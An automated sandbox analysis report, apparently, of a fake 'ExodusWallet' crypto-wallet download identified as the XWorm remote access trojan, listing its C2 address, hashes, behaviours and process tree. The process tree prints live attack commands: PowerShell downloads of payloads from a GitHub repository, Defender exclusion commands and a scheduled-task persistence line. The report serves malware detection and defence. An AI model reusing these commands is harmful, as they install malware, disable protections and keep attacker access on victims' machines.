xworm | 8307d06013e9072761237a4432ef62e3cb02ad28e16eae71d9e4191c002dcb44

Analysis

max time kernel
113s
max time network
117s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
06/03/2025, 22:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExodusWallet.zip
Size

54.1MB
MD5

0cf76bda289fe2a0f47dd6ae4d8e5c92
SHA1

7ec6f979cd7920d2017a658f0d86ba49c4f8c2e7
SHA256

8307d06013e9072761237a4432ef62e3cb02ad28e16eae71d9e4191c002dcb44
SHA512

1704d48b027da2a20f599b368000a37272e7ba15b9f051fd1ab9c26ec57da8c84f20dabd118aab8cfeb4b81a8e193890cb9ac845af5dda67d418494919c875fc
SSDEEP

1572864:QNV4NFAUmDbtJ3zM/zO8wyQso0jWzan/coE5:g5UKAq8nQJTa/coE5

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/4776-62-0x0000000000E60000-0x0000000000E6E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 10 IoCs

flow	pid	Process
3	788	powershell.exe
4	788	powershell.exe
6	5024	powershell.exe
7	5024	powershell.exe
9	3896	powershell.exe
10	3896	powershell.exe
12	2816	powershell.exe
13	2816	powershell.exe
14	544	powershell.exe
15	544	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
788	powershell.exe
5024	powershell.exe
3896	powershell.exe
2816	powershell.exe
544	powershell.exe
4648	powershell.exe
2768	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 11 IoCs

pid	Process
3796	ExodusInject.exe
4900	Exodus.exe
4776	AggregatorHost.exe
2344	ExodusInject.exe
4104	Exodus.exe
2764	System.exe
736	System.exe
3168	System.exe
3048	System.exe
1908	System.exe
3692	ExodusInject.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
13	raw.githubusercontent.com
15	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4044	timeout.exe

Modifies registry class 9 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Taskmgr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4004	schtasks.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
788	powershell.exe
788	powershell.exe
5024	powershell.exe
5024	powershell.exe
4648	powershell.exe
4648	powershell.exe
2768	powershell.exe
2768	powershell.exe
3896	powershell.exe
3896	powershell.exe
2816	powershell.exe
2816	powershell.exe
544	powershell.exe
544	powershell.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	788	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	3796	ExodusInject.exe
Token: SeBackupPrivilege	1140	vssvc.exe
Token: SeRestorePrivilege	1140	vssvc.exe
Token: SeAuditPrivilege	1140	vssvc.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	4776	AggregatorHost.exe
Token: SeDebugPrivilege	4776	AggregatorHost.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	2344	ExodusInject.exe
Token: SeDebugPrivilege	2472	Taskmgr.exe
Token: SeSystemProfilePrivilege	2472	Taskmgr.exe
Token: SeCreateGlobalPrivilege	2472	Taskmgr.exe
Token: SeDebugPrivilege	2764	System.exe
Token: 33	2472	Taskmgr.exe
Token: SeIncBasePriorityPrivilege	2472	Taskmgr.exe
Token: SeDebugPrivilege	736	System.exe
Token: SeDebugPrivilege	3168	System.exe
Token: SeDebugPrivilege	3048	System.exe
Token: SeDebugPrivilege	1908	System.exe
Token: SeDebugPrivilege	3692	ExodusInject.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe

Suspicious use of SendNotifyMessage 43 IoCs

pid	Process
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe
2472	Taskmgr.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 3496	2696	ExodusLoader.exe	91
PID 2696 wrote to memory of 3496	2696	ExodusLoader.exe	91
PID 3496 wrote to memory of 788	3496	cmd.exe	92
PID 3496 wrote to memory of 788	3496	cmd.exe	92
PID 3496 wrote to memory of 5024	3496	cmd.exe	93
PID 3496 wrote to memory of 5024	3496	cmd.exe	93
PID 3496 wrote to memory of 3796	3496	cmd.exe	94
PID 3496 wrote to memory of 3796	3496	cmd.exe	94
PID 3496 wrote to memory of 4900	3496	cmd.exe	95
PID 3496 wrote to memory of 4900	3496	cmd.exe	95
PID 3796 wrote to memory of 4648	3796	ExodusInject.exe	100
PID 3796 wrote to memory of 4648	3796	ExodusInject.exe	100
PID 3796 wrote to memory of 2768	3796	ExodusInject.exe	102
PID 3796 wrote to memory of 2768	3796	ExodusInject.exe	102
PID 3796 wrote to memory of 1456	3796	ExodusInject.exe	105
PID 3796 wrote to memory of 1456	3796	ExodusInject.exe	105
PID 1456 wrote to memory of 4044	1456	cmd.exe	107
PID 1456 wrote to memory of 4044	1456	cmd.exe	107
PID 4776 wrote to memory of 4004	4776	AggregatorHost.exe	109
PID 4776 wrote to memory of 4004	4776	AggregatorHost.exe	109
PID 1588 wrote to memory of 2416	1588	ExodusLoader.exe	113
PID 1588 wrote to memory of 2416	1588	ExodusLoader.exe	113
PID 2416 wrote to memory of 3896	2416	cmd.exe	114
PID 2416 wrote to memory of 3896	2416	cmd.exe	114
PID 3300 wrote to memory of 704	3300	ExodusLoader.exe	117
PID 3300 wrote to memory of 704	3300	ExodusLoader.exe	117
PID 704 wrote to memory of 2816	704	cmd.exe	118
PID 704 wrote to memory of 2816	704	cmd.exe	118
PID 704 wrote to memory of 544	704	cmd.exe	119
PID 704 wrote to memory of 544	704	cmd.exe	119
PID 704 wrote to memory of 2344	704	cmd.exe	120
PID 704 wrote to memory of 2344	704	cmd.exe	120
PID 704 wrote to memory of 4104	704	cmd.exe	121
PID 704 wrote to memory of 4104	704	cmd.exe	121
PID 3632 wrote to memory of 2472	3632	cmd.exe	124
PID 3632 wrote to memory of 2472	3632	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\ExodusWallet.zip
1⤵
PID:2520

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2880

C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F211.tmp\F212.tmp\F213.bat C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- - C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe
    "C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp19EC.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1456
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4044
- - C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe
    "C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:4900

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4004

C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\32D3.tmp\32D4.tmp\32D5.bat C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3896

C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4CB4.tmp\4CB5.tmp\4CB6.bat C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:544
- - C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe
    "C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe
    "C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:4104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3632
- C:\Windows\system32\Taskmgr.exe
  taskmgr
  2⤵
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2472

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\ProgramData\System.exe
"C:\ProgramData\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\ProgramData\System.exe
"C:\ProgramData\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\ProgramData\System.exe
"C:\ProgramData\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\ProgramData\System.exe
"C:\ProgramData\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe
"C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ExodusInject.exe.log

Filesize
1KB

MD5
f6c3217ec689b141d7f25ac85fc4a743

SHA1
7f9a3649763d4ce860b1b7317697072a1e41a7c0

SHA256
bd4870c8c9528c06c8354a711800590546f6556b2304877dc4bedb612d71e27b

SHA512
1f603310bf1a649eb2df3e05f06d49827b5167b83435f1350bb305a0a0d365a0ed99287d973d507d467c22f2b407bb952ed13c236624cde753cedf39d1524cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Filesize
1KB

MD5
c2c59919d45232691e841adcf85a7ed2

SHA1
f7a1d810e35e455618050f586592a445376c3224

SHA256
e567ead667e68f92cf9b7a7b171f2dd628803add6dc0744004f26808048bb47c

SHA512
bd37bbed0d8512bfaba4185722831ca73fe5be4d5625b74e9f18cfe1cc0bbd4af786c36eca1bd856decbbc68d1f472ee8aef8e1a41b7251ff480e8fb4eabed6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4610d4b2a2c516b211af2d09121a8624

SHA1
ad7763fa273628c95d2447d50a8641fcb8921e8f

SHA256
9fa30c6cd95b1a4ef7ae5aad9c56369dbf3fb0fdd47f4f7eb2d2b3e6e41199ae

SHA512
4e81356fb3fad40dc498cd450ff3512a671253b5d259395d77004fca3c87c0a7810231b57d4ed318e0a5aa84792eb71db505806997d16929a302436bad658948

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e6baeec02c3d93dce26652e7acebc90

SHA1
937a7b4a0d42ea56e21a1a00447d899a2aca3c28

SHA256
137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

SHA512
461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ba8d03d9d09f8ab05ef694dea36596d

SHA1
0bb07da9d44b03720127ed9fb46d7de7454fdb79

SHA256
ee27d919a2a29e00b65110e779c83803b2d2f9d79fef103729c8ac46cc1f6711

SHA512
dfd2299c7950c69a8ed1fef842dd73f8818ba0632e22d34da50a6e531fd7719ef4076a3674c219881255401f4172b5746c7abc206d16206e3960a70b30673f22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1cebd15e19078003226326aa50667159

SHA1
6d346e2ff9b8b6834a3e4b58240c41f5178e57f9

SHA256
ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe

SHA512
81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
80707036df540b6657f9d443b449e3c3

SHA1
b3e7d5d97274942164bf93c8c4b8a9b68713f46f

SHA256
6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0

SHA512
65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf157ab84a2fea1773266f2e44ea3a20

SHA1
2505107623f778336ee11d608b353ec4dc78a03c

SHA256
74910075ea491fff23748eda5cbd6f6ab1790a943103d8d2546af352e77b015e

SHA512
2c9f3c7b8333b6aa4b005722ef74c3625181da6f5b6ba1495397350cbe73a4740b15d717ba4cd7215ef07559cb0397eb27d59a91d3d894ae1b0d59924b5f2ffa

Download Submit
C:\Users\Admin\AppData\Local\Temp\F211.tmp\F212.tmp\F213.bat

Filesize
491B

MD5
54436d8e8995d677f8732385734718bc

SHA1
246137700bee34238352177b56fa1c0f674a6d0b

SHA256
20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

SHA512
57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_af250xqz.bvi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp19EC.tmp.bat

Filesize
166B

MD5
d31cda73a06acf1bf3185065eb05566c

SHA1
20314190676b2d1ff7dc81c134e4a28a82e73088

SHA256
e0b14ac57d0ef2e98102de5207db2c0873075f02068a9fef7fdc0df695603c2b

SHA512
8761059a278c4412c2347ecde51156c0463ca13890696b1ceb475eb10e6c0441d86ca046348af448dd8a1a36c8dcc62df222ec2f0664df5f6dd1d572586ba697

Download Submit
C:\Users\Admin\AppData\Roaming\ExodusCopy\pref.json

Filesize
2KB

MD5
400759323da511e5e0aedc715266b777

SHA1
51d9527d188fd58294ebea98493c7db5af4ef776

SHA256
299b2bae5f3ed2730d77e48f2acc68e99b498f2ece2ecd8eac7aaf8e0451634c

SHA512
3d748137f67a67945a43b21ce2c028d9a220a82e09d1f6b938fba843aed4152fe06052e45707211e3f97d048fc85f9d2f2a5797a8267cf0826b0ff24564578e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk

Filesize
665B

MD5
29fceb7ee1c485f6528333dc0e02df42

SHA1
f86f007c09f2d0bbbed028463fc7c70269e4b8c2

SHA256
d0f84ff3903ba7c3b828be603e3c62a6d4e118459a996652dbd5d54a870ebd8c

SHA512
053250ec5dde685cea81e845132aec778d637d22cfd38300ff85898b1a379d44055fe583816a4104a3be1df30488147f2e194d07e52cf843373f83ce8d53287a

Download Submit
C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe

Filesize
507KB

MD5
470ccdab5d7da8aafc11490e4c71e612

SHA1
bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

SHA256
849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

SHA512
6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

Download Submit
C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe

Filesize
227KB

MD5
38b7704d2b199559ada166401f1d51c1

SHA1
3376eec35cd4616ba8127b976a8667e7a0aac87d

SHA256
153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

SHA512
